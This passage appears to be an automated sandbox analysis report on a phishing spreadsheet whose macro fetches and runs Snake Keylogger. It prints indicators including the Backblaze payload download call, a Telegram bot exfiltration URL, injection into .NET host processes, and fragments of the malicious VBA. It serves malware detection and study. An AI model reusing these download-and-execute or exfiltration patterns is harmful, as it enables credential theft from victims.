Source: AddInProcess32.exe, 0000000A.00000002.6528028447.0000000003278000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000018.00000002.6529323611.000000000332A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001E.00000002.6524645352.0000000002B5A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:287400%0D%0ADate%20a
Source: AddInProcess32.exe, 0000000A.00000002.6555705690.000000000424E000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000018.00000002.6557022160.0000000004301000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001E.00000002.6550633592.0000000003B31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: AddInProcess32.exe, 0000000A.00000002.6555705690.000000000424E000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000018.00000002.6557022160.0000000004301000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001E.00000002.6550633592.0000000003B31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: AddInProcess32.exe, 0000000A.00000002.6555705690.000000000424E000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000018.00000002.6557022160.0000000004301000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001E.00000002.6550633592.0000000003B31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: AddInProcess32.exe, 0000000A.00000002.6528028447.000000000329D000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000018.00000002.6529323611.000000000334E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001E.00000002.6524645352.0000000002B7D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: powershell.exe, 00000008.00000002.1271841182.000001E233503000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000008.00000002.1271841182.000001E233503000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000008.00000002.1271841182.000001E233503000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: AddInProcess32.exe, 0000000A.00000002.6555705690.000000000424E000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000018.00000002.6557022160.0000000004301000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001E.00000002.6550633592.0000000003B31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: AddInProcess32.exe, 0000000A.00000002.6555705690.000000000424E000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000018.00000002.6557022160.0000000004301000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001E.00000002.6550633592.0000000003B31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtabv20
Source: AddInProcess32.exe, 0000000A.00000002.6555705690.000000000424E000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000018.00000002.6557022160.0000000004301000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001E.00000002.6550633592.0000000003B31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: vbaProject.bin	String found in binary or memory: https://f004.backblazeb2.com
Source: vbaProject.bin	String found in binary or memory: https://f004.backblazeb2.com/file/mdocument/PO202502DAKE.zip
Source: vbaProject.bin	String found in binary or memory: https://f004.backblazeb2.com/file/mdocument/PO202502SNAKWS.zip
Source: svchost.exe, 0000000B.00000003.1207359439.0000021CA107A000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.11.dr	String found in binary or memory: https://g.live.com/odclientsettings/Prod-C:
Source: svchost.exe, 0000000B.00000003.1207359439.0000021CA1000000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.11.dr	String found in binary or memory: https://g.live.com/odclientsettings/ProdV2-C:
Source: AddInProcess32.exe, 0000000A.00000002.6555705690.000000000424E000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000018.00000002.6557022160.0000000004301000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001E.00000002.6550633592.0000000003B31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gemini.google.com/app?q=
Source: powershell.exe, 00000008.00000002.1246079308.000001E2236B7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000008.00000002.1271841182.000001E233503000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: AddInProcess32.exe, 0000000A.00000002.6528028447.0000000003278000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.6528028447.0000000003250000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.6528028447.00000000031E1000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000018.00000002.6529323611.0000000003302000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000018.00000002.6529323611.000000000332A000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000018.00000002.6529323611.0000000003292000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001E.00000002.6524645352.0000000002B5A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001E.00000002.6524645352.0000000002B32000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001E.00000002.6524645352.0000000002AC2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: PO202502SNAKWS.exe, 00000006.00000002.1199461770.000002B6CE800000.00000004.00001000.00020000.00000000.sdmp, PO202502SNAKWS.exe, 00000006.00000002.1198814706.0000027638000000.00000004.00001000.00020000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.6507934250.0000000000435000.00000040.00000400.00020000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.6528028447.00000000031E1000.00000004.00000800.00020000.00000000.sdmp, PO202502SNAKWS.exe, 00000016.00000002.1302880472.000001B37F400000.00000004.00001000.00020000.00000000.sdmp, PO202502SNAKWS.exe, 00000016.00000002.1303236859.000001F414400000.00000004.00001000.00020000.00000000.sdmp, AddInProcess32.exe, 00000018.00000002.6529323611.0000000003292000.00000004.00000800.00020000.00000000.sdmp, PO202502SNAKWS.exe, 0000001B.00000002.1378826053.0000015F2A400000.00000004.00001000.00020000.00000000.sdmp, PO202502SNAKWS.exe, 0000001B.00000002.1379298325.0000019FBF400000.00000004.00001000.00020000.00000000.sdmp, InstallUtil.exe, 0000001E.00000002.6524645352.0000000002AC2000.00000004.00000800.00020000.00000000.sdmp, nasrallah_x86.dll.3.dr, nasrallah_x86.dll.6.dr	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: InstallUtil.exe, 0000001E.00000002.6524645352.0000000002AC2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: AddInProcess32.exe, 0000000A.00000002.6528028447.0000000003278000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.6528028447.0000000003250000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.6528028447.000000000320B000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000018.00000002.6529323611.0000000003302000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000018.00000002.6529323611.000000000332A000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000018.00000002.6529323611.00000000032BD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001E.00000002.6524645352.0000000002B5A000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001E.00000002.6524645352.0000000002B32000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001E.00000002.6524645352.0000000002AEC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
Source: AddInProcess32.exe, 0000000A.00000002.6528028447.000000000329D000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 0000000A.00000002.6561961431.00000000065F2000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000018.00000002.6560823931.000000000652B000.00000004.00000020.00020000.00000000.sdmp, AddInProcess32.exe, 00000018.00000002.6529323611.000000000334E000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000018.00000002.6560823931.0000000006550000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000001E.00000002.6558369408.0000000006002000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000001E.00000002.6524645352.0000000002B7D000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001E.00000002.6558369408.0000000005FD7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0
Source: vbaProject.bin	String found in binary or memory: https://tursiian.com/7z.txt
Source: vbaProject.bin	String found in binary or memory: https://tursiian.com/7z.txt$
Source: AddInProcess32.exe, 0000000A.00000002.6555705690.000000000424E000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000018.00000002.6557022160.0000000004301000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001E.00000002.6550633592.0000000003B31000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/v20
Source: AddInProcess32.exe, 0000000A.00000002.6528028447.000000000329D000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000018.00000002.6529323611.000000000334E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001E.00000002.6524645352.0000000002B7D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49686 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49686
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49702
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 149.137.128.16:443 -> 192.168.2.10:49686 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49752 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.253.67:443 -> 192.168.2.10:49754 version: TLS 1.2

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Window created: window name: CLIPBRDWNDCLASS	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Window created: window name: CLIPBRDWNDCLASS
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Window created: window name: CLIPBRDWNDCLASS

System Summary

Malicious sample detected (through community Yara rule)

Source: 24.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 22.2.PO202502SNAKWS.exe.1b37f45caa0.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 22.2.PO202502SNAKWS.exe.1b37f45caa0.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 22.2.PO202502SNAKWS.exe.1b37f45caa0.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 27.2.PO202502SNAKWS.exe.15f2a45caa0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 27.2.PO202502SNAKWS.exe.15f2a45caa0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 27.2.PO202502SNAKWS.exe.15f2a45caa0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 27.2.PO202502SNAKWS.exe.15f2a45caa0.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 27.2.PO202502SNAKWS.exe.15f2a45caa0.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 27.2.PO202502SNAKWS.exe.15f2a45caa0.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 6.2.PO202502SNAKWS.exe.2763805caa0.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 6.2.PO202502SNAKWS.exe.2763805caa0.0.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 22.2.PO202502SNAKWS.exe.1b37f45caa0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 22.2.PO202502SNAKWS.exe.1b37f45caa0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 22.2.PO202502SNAKWS.exe.1b37f45caa0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 6.2.PO202502SNAKWS.exe.2763805caa0.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 6.2.PO202502SNAKWS.exe.2763805caa0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 6.2.PO202502SNAKWS.exe.2763805caa0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
Source: 6.2.PO202502SNAKWS.exe.2763805caa0.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0000001B.00000002.1378826053.0000015F2A400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000016.00000002.1302880472.000001B37F400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000006.00000002.1199461770.000002B6CE800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0000001B.00000002.1379298325.0000019FBF400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000006.00000002.1198814706.0000027638000000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000016.00000002.1303236859.000001F414400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: PO202502SNAKWS.exe PID: 7008, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: PO202502SNAKWS.exe PID: 7952, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: PO202502SNAKWS.exe PID: 6056, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: C:\Users\user\SystemRootDoc\nasrallah_x86.dll, type: DROPPED	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\nasrallah_x86.dll, type: DROPPED	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Source: screenshot

OCR: Enable Editing Required 10 Please click 'Enable Editing' to allow the Invoice Viewer to 11 function

Document contains an embedded VBA macro with suspicious strings

Source: PO202503S.xlsm	OLE, VBA macro line: Set shell = CreateObject("WScript.Shell")
Source: PO202503S.xlsm	OLE, VBA macro line: Open Environ("TEMP") & "\invoice_log.txt" For Append As #fileNum
Source: PO202503S.xlsm	OLE, VBA macro line: Set shell = CreateObject("WScript.Shell")
Source: PO202503S.xlsm	OLE, VBA macro line: currentPath = shell.Environment("PROCESS")("PATH")
Source: PO202503S.xlsm	OLE, VBA macro line: shell.Environment("PROCESS")("PATH") = folder & ";" & currentPath
Source: PO202503S.xlsm	OLE, VBA macro line: temp = Environ("TEMP") & "\invoice_temp\"
Source: VBA code instrumentation	OLE, VBA macro: Module Module2, Function ExecuteFile, String wscript: Set shell = CreateObject("WScript.Shell")	Name: ExecuteFile
Source: VBA code instrumentation	OLE, VBA macro: Module Module2, Function LogMessage, String environ: Open Environ("TEMP") & "\invoice_log.txt" For Append As # fileNum	Name: LogMessage
Source: VBA code instrumentation	OLE, VBA macro: Module Module2, Function AddToPath, String wscript: Set shell = CreateObject("WScript.Shell")	Name: AddToPath
Source: VBA code instrumentation	OLE, VBA macro: Module Module2, Function AddToPath, String environ: currentPath = shell.Environment("PROCESS")("PATH")	Name: AddToPath
Source: VBA code instrumentation	OLE, VBA macro: Module Module2, Function AddToPath, String environ: shell.Environment("PROCESS")("PATH") = folder & ";" & currentPath	Name: AddToPath
Source: VBA code instrumentation	OLE, VBA macro: Module Module2, Function ViewInvoiceOnline, String environ: temp = Environ("TEMP") & "\invoice_temp\"	Name: ViewInvoiceOnline

Document contains an embedded VBA with functions possibly related to ADO stream file operations

Source: PO202503S.xlsm	Stream path 'VBA/Module2' : found possibly 'ADODB.Stream' functions open, read, write
Source: VBA code instrumentation	OLE, VBA macro: Module Module2, Function WriteBinaryFile, API ADODB.Stream.Open("C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.zip")	Name: WriteBinaryFile
Source: VBA code instrumentation	OLE, VBA macro: Module Module2, Function DownloadFile, API IServerXMLHTTPRequest2.Open("GET","https://f004.backblazeb2.com/file/mdocument/PO202502SNAKWS.zip",False)	Name: DownloadFile
Source: VBA code instrumentation	OLE, VBA macro: Module Module2, Function LogMessage, API ADODB.Stream.Open("C:\Users\user\AppData\Local\Temp\invoice_log.txt")	Name: LogMessage

Document contains an embedded VBA with functions possibly related to HTTP operations

Source: PO202503S.xlsm	Stream path 'VBA/Module2' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
Source: VBA code instrumentation	OLE, VBA macro: Module Module2, Function DownloadFile, found possibly 'XMLHttpRequest' functions response, responsebody, status, open, send	Name: DownloadFile
Source: VBA code instrumentation	OLE, VBA macro: Module Module2, Function DownloadTextFile, found possibly 'XMLHttpRequest' functions response, responsetext, status, open, send	Name: DownloadTextFile

Document contains an embedded VBA with functions possibly related to WSH operations (process, registry, environment, or keystrokes)

Source: PO202503S.xlsm

Stream path 'VBA/Module2' : found possibly 'WScript.Shell' functions currentdirectory, environment, exec, run, environ

Office process queries suspicious COM object (likely to drop second stage)

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	COM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}\InProcServer32			Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\InProcServer32			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 6_2_00007FFD10313D90 SetLastError,NtUnmapViewOfSection,GetLastError,		6_2_00007FFD10313D90
Source: C:\Users\user\SystemRootDoc\PO202502SNAKWS.exe	Code function: 22_2_00007FFD0EFE3D90 SetLastError,NtUnmapViewOfSection,GetLastError,		22_2_00007FFD0EFE3D90

Source: C:\Windows\System32\svchost.exe

File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 6_2_00007FF767D943E0	6_2_00007FF767D943E0
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 6_2_00007FF767D957C0	6_2_00007FF767D957C0
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 6_2_00007FF767D97ED0	6_2_00007FF767D97ED0
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 6_2_00007FFD100EBCEE	6_2_00007FFD100EBCEE
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 6_2_00007FFD1017F0C0	6_2_00007FFD1017F0C0
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 6_2_00007FFD1014B180	6_2_00007FFD1014B180
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 6_2_00007FFD1012B210	6_2_00007FFD1012B210
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 6_2_00007FFD1018F240	6_2_00007FFD1018F240
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 6_2_00007FFD1015D280	6_2_00007FFD1015D280
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 6_2_00007FFD101A14B0	6_2_00007FFD101A14B0
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 6_2_00007FFD1018D5C0	6_2_00007FFD1018D5C0
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 6_2_00007FFD1018F5C0	6_2_00007FFD1018F5C0
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 6_2_00007FFD10111656	6_2_00007FFD10111656
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 6_2_00007FFD10123620	6_2_00007FFD10123620
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 6_2_00007FFD100FF780	6_2_00007FFD100FF780
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 6_2_00007FFD10181800	6_2_00007FFD10181800
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 6_2_00007FFD100F7860	6_2_00007FFD100F7860
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 6_2_00007FFD1015B900	6_2_00007FFD1015B900
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 6_2_00007FFD1018F9A0	6_2_00007FFD1018F9A0
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 6_2_00007FFD10195A20	6_2_00007FFD10195A20
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 6_2_00007FFD10127BA0	6_2_00007FFD10127BA0
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 6_2_00007FFD1015FC80	6_2_00007FFD1015FC80
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 6_2_00007FFD1018DC60	6_2_00007FFD1018DC60
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 6_2_00007FFD100E3CC0	6_2_00007FFD100E3CC0
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 6_2_00007FFD1018DD00	6_2_00007FFD1018DD00
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 6_2_00007FFD100F1DCB	6_2_00007FFD100F1DCB
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 6_2_00007FFD10119ED6	6_2_00007FFD10119ED6
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 6_2_00007FFD100E3E9F	6_2_00007FFD100E3E9F
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 6_2_00007FFD1012BFF0	6_2_00007FFD1012BFF0
Source: C:\Users\user\AppData\Local\Temp\invoice_temp\PO202502SNAKWS.exe	Code function: 6_2_00007FFD101FE120	6_2_00007FFD101FE120
